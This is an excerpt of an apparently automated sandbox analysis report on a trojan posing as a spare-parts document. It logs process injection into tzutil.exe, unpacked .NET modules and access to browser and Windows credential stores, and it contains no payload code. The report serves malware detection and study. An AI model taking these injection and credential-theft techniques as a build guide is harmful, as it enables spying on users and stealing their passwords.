                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2DD0 NtDelayExecution,4_2_011D2DD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2C00 NtQueryInformationProcess,4_2_011D2C00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2C60 NtCreateKey,4_2_011D2C60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2CA0 NtQueryInformationToken,4_2_011D2CA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2CC0 NtQueryVirtualMemory,4_2_011D2CC0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2CF0 NtOpenProcess,4_2_011D2CF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2F30 NtCreateSection,4_2_011D2F30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2F60 NtCreateProcessEx,4_2_011D2F60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2F90 NtProtectVirtualMemory,4_2_011D2F90
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2FB0 NtResumeThread,4_2_011D2FB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2FA0 NtQuerySection,4_2_011D2FA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2FE0 NtCreateFile,4_2_011D2FE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2E30 NtWriteVirtualMemory,4_2_011D2E30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2E80 NtReadVirtualMemory,4_2_011D2E80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2EA0 NtAdjustPrivilegesToken,4_2_011D2EA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2EE0 NtQueueApcThread,4_2_011D2EE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D3010 NtOpenDirectoryObject,4_2_011D3010
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D3090 NtSetValueKey,4_2_011D3090
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D39B0 NtGetContextThread,4_2_011D39B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D3D10 NtOpenProcessToken,4_2_011D3D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D3D70 NtOpenThread,4_2_011D3D70
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D4340 NtSetContextThread,LdrInitializeThunk,9_2_033D4340
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D4650 NtSuspendThread,LdrInitializeThunk,9_2_033D4650
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2B60 NtClose,LdrInitializeThunk,9_2_033D2B60
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_033D2BA0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_033D2BF0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_033D2BE0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2AF0 NtWriteFile,LdrInitializeThunk,9_2_033D2AF0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2AD0 NtReadFile,LdrInitializeThunk,9_2_033D2AD0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2F30 NtCreateSection,LdrInitializeThunk,9_2_033D2F30
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2FB0 NtResumeThread,LdrInitializeThunk,9_2_033D2FB0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2FE0 NtCreateFile,LdrInitializeThunk,9_2_033D2FE0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_033D2E80
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_033D2EE0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_033D2D30
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_033D2D10
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_033D2DF0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2DD0 NtDelayExecution,LdrInitializeThunk,9_2_033D2DD0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_033D2C70
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2C60 NtCreateKey,LdrInitializeThunk,9_2_033D2C60
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_033D2CA0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D35C0 NtCreateMutant,LdrInitializeThunk,9_2_033D35C0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D39B0 NtGetContextThread,LdrInitializeThunk,9_2_033D39B0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2B80 NtQueryInformationFile,9_2_033D2B80
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2AB0 NtWaitForSingleObject,9_2_033D2AB0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2F60 NtCreateProcessEx,9_2_033D2F60
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2FA0 NtQuerySection,9_2_033D2FA0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2F90 NtProtectVirtualMemory,9_2_033D2F90
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2E30 NtWriteVirtualMemory,9_2_033D2E30
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2EA0 NtAdjustPrivilegesToken,9_2_033D2EA0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2D00 NtSetInformationFile,9_2_033D2D00
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2DB0 NtEnumerateKey,9_2_033D2DB0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2C00 NtQueryInformationProcess,9_2_033D2C00
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2CF0 NtOpenProcess,9_2_033D2CF0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D2CC0 NtQueryVirtualMemory,9_2_033D2CC0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D3010 NtOpenDirectoryObject,9_2_033D3010
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D3090 NtSetValueKey,9_2_033D3090
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D3D10 NtOpenProcessToken,9_2_033D3D10
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_033D3D70 NtOpenThread,9_2_033D3D70
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_00AC9480 NtCreateFile,9_2_00AC9480
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_00AC95F0 NtReadFile,9_2_00AC95F0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_00AC96E0 NtDeleteFile,9_2_00AC96E0
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_00AC9780 NtClose,9_2_00AC9780
                      Source: C:\Windows\SysWOW64\tzutil.exe Code function: 9_2_00AC98E0 NtAllocateVirtualMemory,9_2_00AC98E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D516C9_2_033D516C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033AB1B09_2_033AB1B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0344F0CC9_2_0344F0CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F0E09_2_0345F0E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034570E99_2_034570E9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A70C09_2_033A70C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F7B09_2_0345F7B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E56309_2_033E5630
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034516CC9_2_034516CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034575719_2_03457571
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034695C39_2_034695C3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343D5B09_2_0343D5B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033914609_2_03391460
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F43F9_2_0345F43F
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FB769_2_0345FB76
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03415BF09_2_03415BF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BFB809_2_033BFB80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033DDBF99_2_033DDBF9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03457A469_2_03457A46
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FA499_2_0345FA49
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03413A6C9_2_03413A6C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0344DAC69_2_0344DAC6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E5AA09_2_033E5AA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03441AA39_2_03441AA3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343DAAC9_2_0343DAAC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034359109_2_03435910
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A99509_2_033A9950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BB9509_2_033BB950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0340D8009_2_0340D800
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A38E09_2_033A38E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FF099_2_0345FF09
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A1F929_2_033A1F92
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03363FD59_2_03363FD5
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03363FD29_2_03363FD2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FFB19_2_0345FFB1
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A9EB09_2_033A9EB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03451D5A9_2_03451D5A
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03457D739_2_03457D73
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A3D409_2_033A3D40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BFDC09_2_033BFDC0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03419C329_2_03419C32
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FCF29_2_0345FCF2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB21309_2_00AB2130
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD0489_2_00AAD048
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD0509_2_00AAD050
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAB2909_2_00AAB290
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD2709_2_00AAD270
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAB3E09_2_00AAB3E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB57F09_2_00AB57F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB39FB9_2_00AB39FB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB3A009_2_00AB3A00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ACBD509_2_00ACBD50
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE5449_2_031CE544
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE4269_2_031CE426
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CD9A89_2_031CD9A8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE8DC9_2_031CE8DC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CCC489_2_031CCC48
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0118B970 appears 280 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 011E7E54 appears 101 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 011D5130 appears 58 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0120EA12 appears 86 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0121F290 appears 105 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0341F290 appears 105 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 033E7E54 appears 110 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 033D5130 appears 58 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0340EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0338B970 appears 280 times
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1379521165.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000000.1338874237.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemSVq.exe@ vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1391339885.0000000007C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1388807921.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.000000000128D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeBinary or memory string: OriginalFilenamemSVq.exe@ vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, B8wjwMpAXSs0e9RYt6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@6/3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.log
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\tzutil.exe File created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2131739648.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2601354359.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2601354359.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: unknownProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: riched20.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: usp10.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: msls31.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Section loaded: windowscodecs.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
